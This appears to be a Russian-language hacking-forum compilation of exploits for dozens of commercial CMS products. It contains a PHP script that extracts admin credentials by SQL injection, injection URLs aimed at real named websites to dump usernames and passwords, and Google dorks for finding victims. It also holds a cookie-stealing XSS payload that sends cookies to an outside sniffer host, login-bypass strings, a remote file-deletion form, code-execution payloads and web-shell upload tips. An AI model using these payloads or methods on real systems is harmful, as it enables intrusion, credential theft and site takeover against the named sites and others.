VIEW_DEFINITION
CHECK_OPTION
IS_UPDATABLE
DEFINER
SECURITY_TYPE
Table [alpinein_cmsalpine]
Table [es_country]
id
Table [esnm_admin]
es_username
es_password
es_level
es_blocked
Table [esnm_announcements]
es_text
es_type
es_temp
es_postedon
Table [esnm_articles]
es_title
es_sum
es_desc
es_img
es_hide
tempdate
es_date
es_postedon
es_modifiedon
es_uid
es_cid
es_top_banner
es_left_banner
es_order_index
Table [esnm_categories]
es_cat_name
es_pid
es_status
es_cat_description
es_top_banner
es_left_banner
es_order_index
Table [esnm_config]
es_site_name
es_site_root
es_html_header
es_html_footer
es_recperpage
es_image_size
es_site_keywords
es_thumb_size
es_mem_approval
es_signup_verification
es_null_char
es_admin_email
es_logincheck
es_welcome_msg
es_general_notice
Table [esnm_country]
id
Table [esnm_events]
es_title
es_desc
tempdate
es_postedon
es_approved
es_featured
Table [esnm_feedback]
es_fname
es_lname
es_email
es_url
es_title
es_comments
Table [esnm_form_fields]
es_type
es_name
es_label
es_int_value
es_req
es_display
es_width
es_num_lines
es_is_num
es_formid
es_order_index
Table [esnm_forms]
es_title
es_submit_mail
Table [esnm_front_cats]
es_cid
es_show_desc
es_rec
es_order
Table [esnm_mails]
es_mailid
es_fromid
es_title
es_subject
es_mail
es_status
es_html_format
Table [esnm_members]
es_username
es_password
es_label
es_firstname
es_lastname
es_email
es_street
es_city
es_state
es_zip
es_country
tempdate
es_ondate
es_lastlogin
es_suspended
es_phone
es_mobile
es_paid
es_general_notice
Table [esnm_pages]
es_title
es_contents
es_top_banner
es_left_banner
Table [esnm_signups]
es_rnum
es_email
es_onstamp
Table [esnm_subscribers]
es_name
es_email
Table [esnm_subscribers1]
es_name
es_email
Table [esnm_testimonials]
es_desc
es_from
tempdate
es_postedon

Пример:
prescare.org.au/article.php?es_id=-1+union+select+1,concat_ws(0x3a,es_username,es_pas sword),3,4,5,6,7,8,9,10,11,12,13,14,15+from+esnm_a dmin/*&cid=2

InterTech WCMS SQL-injection Exploit

Оф.сайт: intertech-pal.com (http://ephpscripts.com)
Дата: 30.09.08
Первоисточник: http://www.securitylab.ru/vulnerability/360260.php (эксплоита нет)
Дорк: "Designed by: InterTech Co" id

Описание: Уязвимость существует из-за недостаточной (или ее отсутствии вовсе) фильтрации входящего параметра, передаваемого через $_GET массив,
атакуещему позволяет провести SQL - инъекцию.
Способы устранения уязвимости: проводить жесткую фильтрацию параметров перед передачей их в SQL - запрос.
Подробнее:
Анти SQL-injection (http://forum.antichat.ru/thread55520-%C0%ED%F2%E8+SQL.html)
Защита от SQL-injection (http://forum.antichat.ru/thread30641.html)
Ограничения: Нету

Эксплоит:
<?php

// Coded by ZAMUT

$host = 'www.intertech-pal.com'; # Сайт
$path = '/panorama2/'; # Путь до скрипта
$port = 80; # Порт

echo "Exploiting $host<br><br>";
$sock = fsockopen($host,$port);
if(!$sock)die("failed\n"); else echo "Connecting $host .. -OK<br><br>";


$packet = "GET http://{$host}{$path}etemplate.php?id=-1+union+select+1,2,3,concat(0x3a3a3a,username,0x3a ,password,0x3a3a3a),5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19+from+users+limit+0,1/* HTTP/1.0\r\n";
$packet.= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,";
$packet.= "application/x-shockwave-flash, application/vnd.ms-excel, application/msword, */*\r\n";
$packet.= "Accept-Language: ru\r\n";
$packet.= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.= "Proxy-Connection: Keep-Alive\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Connection: close\r\n\r\n";
fputs($sock,$packet);

while(!feof($sock))
{
$resp.=fgets($sock,512);
if(preg_match("/:::(.+):::/",$resp,$m)){ break; }
}
fclose($sock);

echo "Data (Username, password):<br>";
echo "$m[1]<br>";

?>

с этим адвайсом получилась странная история - после отправки строку на милворм, через 2 дня я увидел его(в урезанном виде) на милворме, но авторство принадлежало каким-то непонятным хенкерам, на что str0ke только развел руками и сказал что они прислали на день раньше. :confused: ну да не важно, все-таки выложу здесь.

================================================== ==============================
|| Xpoz SQL-INJECTION, XSS
================================================== ==============================

Application: Xpoz PRO (Expoze Photo Store)

Website: http://xpoze.org

Version: All(current 1.0)

About: Xpoze is a photo store very easy to use, yet having lots of features to help buyers and sellers to find or sell images after their needs.

Googledork: Powered by Powered by Xpoze.org

Date: 01-07-2008

Description:
Множественные уязвимости типа SQL-injection, Blind-injection, активные и пассивные XSS.

[ SQL-INJECTION ]

some...

http://host/home.html?menu=1[SQL]
http://host/user.html?uid=1[SQL]
http://host/account/admin/edite.html?eid=1[SQL]
http://host/video.html?limiter=0&c=1[SQL]

And other vulnerable files:
---------------------------
// $p=[admin, editor, user, photo]

[ members/$p/edite.inc ]

12: if (isset($delete)) { $ph = mysql_query("SELECT * FROM `photos` WHERE `id`='$delete'") or die(mysql_error()); $row = mysql_fetch_assoc($ph); $url = "../photos/".$row['photo']; $thumb_url = "../thumbs/".$row['photo']; 18: mysql_query("DELETE from `photos` WHERE `id`='$delete'") or die(mysql_error());
187(171 or 163): $ph = mysql_query("SELECT * FROM `photos` WHERE `hash`='$hash'") or die(mysql_error());


[ members/$p/editp.inc ]

$sql = mysql_query("SELECT * FROM `photos` WHERE `id`='$pid'") or die(mysql_error());

[ include/img.rating.php ]

$rat = mysql_query("SELECT * FROM `ratings` WHERE `photo`='$id'") or die(mysql_error()); $rates = mysql_num_rows($rat);

ETC...

===>>> Exploit:

http://host/user.html?uid=-1%20union%20select%201,user,1,1,1,pass,1,1,1,1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20 users%20limit%203,1/*

(!) Пароль в БД в открытом виде (!)

[ ACTIVE XSS ]

В форуме отсутствует фильтрация полей темы и сообщения.

===>>> Exploit:

<script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>

[ PASSIVE XSS :) ]

http://host/?tpl=[XSS]


PHPInfo - http://host/info.php

Absolute shopping cart

Сайт: http://www.absoluteshoppingcart.co.uk (http://www.absoluteshoppingcart.co.uk/)
Цена: от £19.99
------
SQL-Injection

http://victim.com/latest_detail.asp?prod_id=147&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*

prod_id должен быть реальным..

shop-script 1.24
скрипт - один из самых распрастраненых движков интернет магазина. сейчас сняли с продажи, так как запустили новый скрипт. но shop-script 'ом все еще активно пользуются и не спешат переходить на новый продукт.

magic_quotes_gpc = OFF

Sql Injection:
проверка на уязвимость:

http://fanataudio.ru/cart.php?add2cart=120000%23'+OR+ascii(substring((s elect+Login+from+SS_customers+where+customerID%3D1 )%2C1%2C1))>0+and+''%3D'

если товар (любой) добавился то сайт уязвим

уязвимая переменная add2cart
так как поля не выводятся то вытащить пароль админа можно перебором по буковке.
пароль зашифрован base64 тоесть открыт
логин не зашифрован, в 99.9% админ это юсер с customerID=1
и в 80% его логин admin

google: inurl:"index.php?feedback=yes"
примерно 1500 сайтов


приведен реальный пример уязвимого сайта


кстати для тех кто взламал логин/пароль магазина: добавить шелл можно через добавление нового товара. просто указываете что товар является програмой. в путь выбираете любой файл шелла
не забудьте перед тем как добавить шелл залить файл .htaccess со значением Allow from all

Post Affiliate Pro

Версия: 3.0.6 и более ранние
Дорк: inurl:affiliates intext:"version 3.0." "generated in" "DB Requests"

Уязвимый код:

/affiliate/include/Affiliate/Merchants/Views/ResourceBrowser.class.php:

function process() {
if(!empty($_REQUEST['action'])) {
switch($_REQUEST['action']) {
case 'addheader':
$this->processAddHeader();
break;
/**/
}
}

function processAddHeader() {
if($_REQUEST['commited'] == 'yes') {
$name = $_REQUEST['header_name'];
$caption = $_REQUEST['header_caption'];
if(!empty($name) && !empty($caption)) {
$this->menu->createMenuHeader($name, $caption);
$this->menu->save();
return true;
} /**/
}

/affiliate/include/QUnit/UI/Menu.class.php

function createMenuHeader($name, $caption) {
if($caption != '') eval("\$caption = $caption;");
/**/
}

Эксплоит:
/affiliate/merchants/styles.php?md=Affiliate_Merchants_Views_ResourceBr owser&action=addheader&commited=yes&header_name=lolol&header_caption=phpinfo()

Citrix NetScaler v.7

Уязвимый Файл: generic_api_call.pl

XSS:
http://site/ws/generic_api_call.pl?function=statns&stan
dalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e

Продукт: ArticleLive (Interspire Website Publisher)
Версия: NX.1.7.1.2(возможно и более ранние версии)
Веб-сайт разработчика:http://www.interspire.com/
Цена:$249
Уязвимый скрипт:blogs.php?id={SQL-injection}

Пример:
http://www.journalismproject.ca/english_new/blogs.php?id=-768+union+select+1,concat(username,0x3a,password), 3,4,5,6,7,8,9,10,11,12,13,144,15,16,17,18,19,20,21 ,22,23,24,25,26,27+from+ArticleLive_users+limit+0, 1--
(c) IceAngel_

DMXReady Scripts
http://www.dmxready.com
Уязвимость: Remote Files Delete Vulnerability

Продукт: DMXReady Blog Manager <= 1.1
Цена: 199.97 $
Dork : inurl:inc_webblogmanager.asp
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>ajann Exp</title>
</head>

<body>
<p>Delete File : )</p>
<p>Form Action: http://target/[path]/includes/shared_scripts/wysiwyg_editor/assetmanager/assetmanager.asp?ffilter=</p>
<form id="form1" name="form1" method="post" action="http://target/[path]/includes/shared_scripts/wysiwyg_editor/assetmanager/assetmanager.asp?ffilter=">
<label>
<input type="hidden" name="inpCurrFolder" value="" />
</label>
<p>
<label>
Delete File Path:
<input type="text" name="inpFileToDelete" value="/shots/index.asp">
</label>
etc..
</p>
<p>
<label>
<input type="submit" name="ff" id="ff" value="Submit" />
</label>
</p>
</form>
<p><br />
</p>
</body>
</html>

Уязвимость: Contents Change Vulnerability
Продукт: DMXReady PayPal Store Manager <= 1.1
Цена: 129.97 $
Dork: inurl:inc_paypalstoremanager.asp

Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload

You Find -> http://[target]/[path]//applications/PayPalStoreManager/inc_paypalstoremanager.asp
Edit -> http://[target]/[path]//admin/PayPalStoreManager/CategoryManager/list.asp

Продукт: DMXReady Photo Gallery Manager <= 1.1
Цена: 39.97 $
Dork: inurl:inc_photogallerymanager.asp
Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload


You Find -> http://[target]/[path]//applications/PhotoGalleryManager/inc_photogallerymanager.asp
Edit -> http://[target]/[path]//admin/PhotoGalleryManager/add_category.asp


Продукт: DMXReady Registration Manager <= 1.1
Цена: 49.97 $
Dork: inurl:inc_registrationmanager.asp

Permissions:
Update
Delete
Insert Category / Sub Category

You Find -> http://[target]/[path]//applications/RegistrationManager/inc_registrationmanager.asp
Edit -> http://[target]/[path]//admin/RegistrationManager/add_category.asp

Продукт: DMXReady BillboardManager <= 1.1
Цена: 49.97 $

Permissions:
Update
Delete
Insert Category / Sub Category

You Find -> http://[target]/[path]//applications/BillboardManager/
Edit ->
http://www.demo.dmxready.com/admin/BillboardManager/add_category.asp

Уязвимость: Remote Contents Change Vulnerability


Продукт: DMXReady Catalog Manager <= 1.1
Цена: 149.97 $
Dork: inurl:inc_catalogmanager.asp

Permissions:
Update
Delete
Insert Category / Sub Category

You Find -> http://[target]/[path]//applications/RegistrationManager/inc_registrationmanager.asp
Edit -> http://[target]/[path]//admin/RegistrationManager/add_category.asp

Продукт: DMXReady Contact Us Manager <= 1.1
Цена: 49.97 $
Dork: inurl:inc_contactusmanager.asp

Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload

You Find -> http://[target]/[path]//applications/ContactUsManager/inc_contactusmanager.asp
Edit -> http://[target]/[path]//admin/ContactUsManager/add_category.asp

Продукт: DMXReady Document Library Manager <= 1.1
Цена: 39.97 $
Dork: inurl:inc_documentlibrarymanager.asp

Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload

You Find -> http://[target]/[path]//applications/DocumentLibraryManager/inc_documentlibrarymanager.asp
Edit -> http://[target]/[path]//admin/DocumentLibraryManager/add_category.asp

Продукт: DMXReady Faqs Manager <= 1.1
Цена: 24.97 $
Dork: inurl:inc_faqsmanager.asp

Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload

You Find -> http://[target]/[path]//applications/FaqsManager/inc_faqsmanager.asp
Edit -> http://[target]/[path]//admin/FaqsManager/add_category.asp

Продукт: DMXReady Job Listing <= 1.1
Цена: 49.97 $
Dork: inurl:inc_joblistingmanager.asp

Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload

You Find -> http://[target]/[path]//applications/JobListingManager/inc_joblistingmanager.asp
Edit -> http://[target]/[path]//admin/JobListingManager/CategoryManager/list.asp

Продукт: DMXReady Links Manager <= 1.1
Цена: 24.97 $
Dork: inurl:inc_linksmanager.asp

Permissions:
Update
Delete
Insert Category / Sub Category

You Find -> http://[target]/[path]//applications/LinksManager/inc_linksmanager.asp
Edit -> http://[target]/[path]//admin/LinksManager/add_category.asp

Уязвимость: SQL Injection Vulnerability

Продукт: DMXReady Classified Listings Manager <= 1.1
Цена: 99.97 $
Dork: inurl:inc_classifiedlistingsmanager.asp
Admin Login: http://[target]/[path]//admin/ClassifiedListingsManager/manage.asp

USERNAME->
http://[target]/[path]/admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=5 union select 0,Security_AdminUserName,2,5,9,3 from tblCLM_config

PASSWORD->
http://[target]/[path]///admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=5 union select 0,Security_AdminPassword,2,5,9,3 from tblCLM_config
Продукт: DMXReady Member Directory Manager <= 1.1
Цена:99.97 $
Dork: inurl:inc_memberdirectorymanager.asp
Admin Login: http://[target]/[path]/admin/MemberDirectoryManager/admin.asp

USERNAME->
http://[target]/[path]/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=-1231312 union select 6,Security_AdminUserName,4,3,2,1 from tblMDM_config

PASSWORD->
http://[target]/[path]/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=-1231312 union select 6,Security_AdminPassword,4,3,2,1 from tblMDM_config
Продукт: DMXReady Members Area Manager <= 1.2
Цена: 149.97 $
Dork: inurl:inc_membersareamanager.asp
Admin Login: http://[target]/[path]/admin/MembersAreaManager/admin.asp

USERNAME->
http://[target]/[path]/admin/MembersAreaManager/components/SecurityLevelManager/upload_image_security_level.asp?cid=-12312312 union select 1,Security_AdminUserName,3,4,5,6 from tblConfig

PASSWORD->
http://[target]/[path]/admin/MembersAreaManager/components/SecurityLevelManager/upload_image_security_level.asp?cid=-12312312 union select 1,Security_AdminPassword,3,4,5,6 from tblConfig

Продукт: DMXReady SDK <= 1.1
Уязвимость: Remote File Download Vulnerability
Цена:389.97 $

http://[target]/path/control_panel/download_link.asp?filename=inc_faqsmanager_qs_jump _menu.asp&filelocation={FILE PATH}

Продукт: DMXReady Secure Document Library <= 1.1
Уязвимость: Remote SQL Injection Vulnerability
Цена:189.97 $
Admin Login:http://[target]/[path]/admin/SecureDocumentLibrary/admin.asp

USERNAME->
http://[target]/[path]/admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=-12321 union select 2,Security_AdminPassword,4,5,6,0 from tblConfig

PASSWORD->
http://[target]/[path]/admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=-12321 union select 2,Security_AdminPassword,4,5,6,0 from tblConfig

Продукт: DMXReady Billboard Manager <= 1.1
Уязвимость: Remote File Upload Vulnerability
Цена:49.97 $
Dork: inurl:inc_billboardmanager.asp?ItemID=

# http://[target]/[path]/admin/BillboardManager/upload_document.asp?ItemID=[ItemID]

ItemID= 1,2,3,4,5.......

Example:
You Find -> http://[target]/[path]//applications/BillboardManager/inc_billboardmanager.asp
Edit -> http://[target]/[path]//admin/BillboardManager/upload_document.asp?ItemID=[ItemID]

DMXReady BillboardManager <= 1.1 Contents Change Vulnerability find by x0r
all other vulnerability found by ajann

Сайт разработчика: http://www.sbuilder.ru
Уязвимые версии: тестировалось на версии 3.7, но, вероятно, уязвимость присутствует и в следующих версиях.

Описание:

Движок этой cms создает файлы сайта (index.php, etc) с кодом вида:
<?php if (!isset($GLOBALS['binn_include_path'])) $GLOBALS['binn_include_path'] = ''; ?>

// ...

<?php
include_once($GLOBALS['binn_include_path'].'prog/pl_menu/show_menu.php');
// ...
?>
// ...При register_globals = On, можно записать собственный путь в переменную binn_include_path, и провести атаку LFI или RFI (при allow_url_fopen=On), в случае с LFI, отрезав добавляемый в include_once() путь при помощи null-byte или php path truncation attack.

Кактус CMS
Сайт: http://cms.kaktus.kiev.ua/

SQL-injection

Уязвимый код:
gal_pages.php

. . .
$id_group = $_REQUEST['g'];
if ( $id_group != "" )
{
$wheregroup = " AND ig.id_group=".$id_group;
}
if ( !( $count = mysql_query( "\n\t\t\t\tSELECT COUNT(g.id_image)\n\t\t\t\t\tFROM gallery g\n\t\t\t\t\t\tLEFT JOIN gallery_itemgroups ig\n\t\t\t\t\t\tON ig.id_image=g.id_image\n\t\t\t\t\t\tLEFT JOIN gallery_groups gg\n\t\t\t\t\t\tON gg.id_group=ig.id_group\n\t\t\t\tWHERE 1=1 ".$wheregroup." AND (gg.id_group IS NULL OR gg.active='1')\n\t\t" ) ) )
{
exit( mysql_error( ) );
}
$count = mysql_fetch_row( $count );
. . .


Эксплуатация:

site.com/gallery?g=10+and+substring(version(),1,1)=5--+


Аналогично в модуле Новости

Уязвимый код:
news_pages.php

. . .
$id_group = $_REQUEST['g'];
if ( $id_group != "" )
{
$wheregroup = " AND n.id_group=".$id_group;
}
. . .
$count = mysql_queryresultfield( "\n\t\t\t\tSELECT COUNT(id_news)\n\t\t\t\tFROM news n\n\t\t\t\t\tLEFT JOIN news_groups ng\n\t\t\t\t\tON ng.id_group=n.id_group\n\t\t\t\t\tLEFT JOIN core_lang_varchar l\n\t\t\t\t\tON l.id=n.id_title AND l.lang=".LANG.( "\t\t\t\t\t\n\t\t\t\tWHERE l.value<>'' AND n.kind=".$kind." {$wheregroup} AND (n.id_group IS NULL OR ng.active='1') {$monthfilter}\n\t\t" ) );


Эксплуатация:

site.com/news?g=10+and+substring(version(),1,1)=5--+

Zestos CMS
homepage:http://www.netsitecms.co.uk/
Цена - Zestos CMS perpetual license £4,750 (?7,125)
Пока не заплатишь не получишь. Поэтому и нет уязвимого кода((

Sql-inj Example:
http://www.bim-online.com/playmovie.php?contid=-40+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7,8,9,10/*
Админка: /admin/

Так как нет сорцов - неизвестно название таблицы с юзерами, и разные мелочи...
На домашней странице внизу любезно предоставлены клиенты этой конторы :rolleyes:
Среди них Банк Ирландии какой-то.

SiteWorks Professional

Версия: 5.0 и более ранние

Дорк: "Powered By SiteWorksPro"

Доступ в админку:

/admin/

Login: admin' or 1=1-- -

Выполнение кода:

/admin/setup.php

Site name: {${eval('phpinfo();')}}

SMS-PARTNERS CMS

http://demo.sms-partners.ru/page-contacts/%3E'%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E

sql-injection in PHPKB 1.5 # старые версии 1.5, в новых багу пропатчили но версию не сменили
Online Knowledgebase Builder System
target/admin
login: admin' or 1=1/*
pass: fackthemall

пример:
panther.hartnell.edu/faqs/admin/

PromoCMS

ТИЦ: 150
PR: 0

site : http://www.promopx.ru/

result :
http://www.promopx.ru/portfolio/category.php?branch=17&service=-1+union+select+concat_ws(0x3a,version(),user(),dat abase())--

5.0.22:promopx@localhost:promopx-rus_db

копать колонки тут смысла не видел , так как бэйсик авторизация

PS пытал счастье, но облом, пытайте счастье :) если хотите

CustomCMS (CCMS)
Цена: ~55 $
Активная XSS

/inbox.html
В теле письма "><script>alert();</script>

/notepad.html
</textarea><script>alert(document.cookie);</script>

/index.php?page=Edit+Profile
Уязвимы все поля
"><script>alert();</script>

/newthread-1.html
В Title
<script>alert();</script>

Пассивные XSS
/pm.php?action=Send&rec=1"><script>alert();</script>


/gamesearch.html
в поле Search "><script>alert();</script>

/index.php?page=Articles&action=showarticle&id="><script>alert();</script>

SQL Инъекции:
/link.php?id=-1'+unIon+select+1,2,3,4,5,6,7,concat_ws(0x3a,user( ),version(),database()),9,10,11+--+

Будет 404
У меня например вывелось.

Forbidden
You don't have permission to access /root@localhost:5.0.45-community-nt:cccms on this server.

/ad_out.php?id=-1'+union+select+1,2,3,4,5,6,7,8,9,10/*

6 Поле делат редирект.

/index.php?page=Files&action=showfile&id=1'+union+select+1,2,3,concat_ws(0x3a,user(),ver sion(),database()),5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26/*

/index.php?page=Companies&action=show&t=Agetec'+union+select+1,concat_ws(0x3a,user(),ver sion(),database()),3,4,5,6,7,8+--+





Раскрытие путей
/thumbnailer.php?type[]=avatar


Выполнение произвольного кода через админку:


/admincp/index.php?page=Settings&op=Templates&action=edit&file=company.php
/templates/company.php?shell=phpinfo();




PS
Боже мой...

(с) Ctacok Специально для Antichat.ru

[1] Управление -> Скрипты -> Добавить скрипт:
Название: test
Описание: test
Содержимое: <?phpinfo();?>
Сохранить
[2] Страницы и структура -> Выбираем страницу (предположим что это будет "Новости") -> Выбираем поле (кликаем на него) и выбираем модуль Скрипты (кликаем на него) и жмем Добавить модуль -> Сохранить
Переходим на ту страницу куда добавили модуль (предположим что это будет "Новости").

Saitika CMS

http://saitika.ru/

Blind SQL inj

news_see.php?r=1&id=1[SQL]

Конкретный пример:

http://pack4.saitika.ru/news_see.php?r=258&id=14+and+substring(@@version,1,1)=5

-------------------------------------------------------------------
Site edit CMS

http://siteedit.ru/

Passive XSS

http://free.siteedit.ru/new/?lang=>=''/<script>alert(/xss,xss/)</script>

-------------------------------------------------------------------
(с) Twin $park

CMS I-market

http://www.i-market.ru/

Blind SQL inj


/articles/?id=1[SQL]

пример: http://www.vip-saynu.ru/articles/?id=2+and+substring(@@version,1,1)=4

(с) Twin $park

D.S CMS

http://demo.smolovich.ru/ фиксированная цена отсутствует

SQL inj


admin/?dir=page_block_map&BLOCK_ID=SQL

/?pg=SQL
пример: http://demo.smolovich.ru//?pg=7&n14=4%27+union+select+1,2,3,4,5,6,7/*

XSS

//?pg=XSS

(с) Twin $park

Laderett CMS

http://www.lederett.de/

SQL inj

паример:

http://www.lederett.de/_rubric/detail.php?nr=103+union+select+1,2,3,concat_ws(0x3 a,version(),user(),database()),5,6,7,8,9,10,11,12, 13+limit+1,1/*

XSS

http://www.lederett.de/_rubric/detail.php?nr=<script>alert(/xss/)</script>

(с) Twin $park

Product: Armixcms
Author: armixcms.ru

Blind-SQL?
http://www.armixcms.ru/?id=25'+and+1=1/*
http://www.armixcms.ru/?id=25%27+and+if%28substring%28version%28%29,1,1%2 9=5,1,0%29+--+
логика срабатывает,но при попытке подбора столбцов,я уперся в 0.Мои запросы тупо игнорировались.Если ктотоподберет столбцы,милости прошу в лс,отредактирую сообщение с вашими копирайтами.
Спасибо ElteRUS.раскручиваеться как слепая.
http://www.armixcms.ru/?id=25'+and+if(ascii(substring((select+table_name+ from+information_schema.columns+where+column_name+ like+0x257061737325+limit+0,1),3,1))=116,1,0)--+

- "CMS MYSITE"

Дорк:
"на базе CMS MYSITE", "Результати 1 – 10 з приблизно 228 000 на запит "на базе CMS MYSITE". (0,31 сек)"

==================================================

Уязвимость: sqli - из-за недостаточной фильтрации данных в параметре cid

Выбераем любой сайт, и проверяем его наличие...
http://lookmy.info/portal/modules.php?name=Content&pa=list_pages_categories&cid=-42+union+select+user_website,2+from+inform_users+w here+user_website+LIKE+0x2575626225+LIMIT+0,1--+&pages_number=1
Получаем логин...
http://lookmy.info/portal/modules.php?name=Content&pa=list_pages_categories&cid=-42+union+select+username,2+from+inform_users+where +user_website+LIKE+0x2575626225+LIMIT+0,1--+&pages_number=1
Получаем пароль, расшифровуем (обычный md5)...
http://lookmy.info/portal/modules.php?name=Content&pa=list_pages_categories&cid=-42+union+select+user_password,2+from+inform_users+ where+user_website+LIKE+0x2575626225+LIMIT+0,1--+&pages_number=1
Логинимся...
http://lookmy.info/portal/modules.php?name=Your_Account

Ещё способы получить пароли к сайтам.

==================================================

Уязвимость: SQLinj - из-за недостаточной фильтрации данных в параметрах gid, pid в модуле фотоальбома

Принцип практически тот же..
http://www.vfs.com.ua/index.php?id=5&show=4nalbum&do=showpic&pid=-42+union+select+user_website+from+inform_users+whe re+user_website+LIKE+0x2575626225+LIMIT+0,1--+


Уязвимость: SQLinj - из-за недостаточной фильтрации данных в пост параметрах price_from, price_to, htlNfrom, htlNto, datePlusMinus в модуле поиска.

Вот один из параметров
http://tour.lookmy.info/index.php?id=3815&show=14071
resortsToShow=all&countryKey=all&cityKey=all&CatHot=all&price_from=0+or+(select+count(*)+from+information_ schema.tables+group+by+concat(version(),floor(rand (0)*2)))&price_to=10000&day=12&mon=02&year=2010&datePlusMinus=2&htlNfrom=7&htlNto=15&roomNA=1&roomNC=0&htlBK=all&showRows=30+&btn_find=%CF%EE%E8%F1%EA%21

Создать сайт можно впринципе бесплатно. Но все модули для него платные, потому и поместил его в "платные".

(c)v1d0q

- "Stress web 8.0" - платная cms для MMORPG Lineage2

Дорк:
Результати 1 – 10 з приблизно 4 800 на запит inurl:"index.php?f=forget". (0,06 сек)

Особенность:
Magic_quotes_gpc = off

Один из способов узнать версию, если папка install не удалена - /install/license.lic

==================================================

Уязвимость: sqli - из-за недостаточной фильтрации данных в параметр step2. Файл forget.php

Фильтр

function safe($sql)
{
if ($this->mysql_link)
return mysql_real_escape_string($sql, $this->mysql_link);
else
return mysql_escape_string($sql);
}

Первый шаг

elseif (isset($_POST["submit_lost"]) && isset($_POST["step1"]))
{
if ($_POST["l2sec_code"] != $_SESSION["sw_captcha"] or !$_SESSION["sw_captcha"])
{
$error_lost = "<div class='error'>Обнаружены следующие ошибки:<br>Код безопасности не соответствует отображённому.</div>";
}
else
{
$_SESSION["sw_captcha"] = false;
$lost_l2login = $ldb->safe($_POST["lost_l2login"]);
$sel_question = $ldb->query("SELECT `l2question` FROM `accounts` WHERE `login`='{$lost_l2login}' LIMIT 0,1");

Второй шаг

elseif (isset($_POST["submit_lost"]) && isset($_POST["step2"]))
{
$lost_l2answer = $_POST["lost_l2answer"];
$lost_l2login = $_POST["step2"];
list($lost_l2answer_db, $_l2email) = $ldb->fetch_array($ldb->query("SELECT `l2answer`,`l2email` FROM `accounts` WHERE `login`='{$lost_l2login}' LIMIT 0,1"));
if ($lost_l2answer != $lost_l2answer_db)
{
$error_lost = "<div class='error'>Обнаружены следующие ошибки:<br>Ответ на секретный вопрос не верный!</div>";
}

Как видим, в post параметре step2 (второй шаг формы "забыли пароль"), не фильтруется логин участника, из-за чего и имеем данную уязвимость. Как эксплуатировать? Я думаю разберётесь ;)

(c)v1d0q

DSite CMS
http://www.dsite.ru/
Компания Media Programming Group
SQL injhttp://www.ttplus.ru/index.php?id=8&div_id=-88+union+select+version(),user(),database(),@@vers ion_compile_os,5--+SQL injhttp://www.ttplus.ru/index.php?id=16&article=-25+union+select+1,2,3,4,5,6,7,8,9,10,11,12--+

http://www.webmotor.ru/
CMS система WebMotor
SQL inj
Класика жанра.
Пример где сработало:
http://kids-garden.ru/<tr><td><b>E-mail</b>:</td><td><input type=text name="email" class="tlog1" value=""></td></tr>
<tr><td><b>Пароль</b>:</td><td><input type=password name=password class="tlog1" value=""></td></tr>
<tr><td></td><td><input type=submit value=" Войти " class="enter_01"></td></tr>name = блабла' or 1=1--
пасс любой.
Есть вывод ошибки. Значит можна вытаскивать информацию в ошибку![query: select * from user where email= 'admin' or (1,2)=(select * from (select name_const(version(),1),name_const(version(),1))x)-- ' and password = 'fg'
error: Duplicate column name '5.1.43-log'
in file: /home/kidsgarden/html/inc/auto/user.inc at line: 78]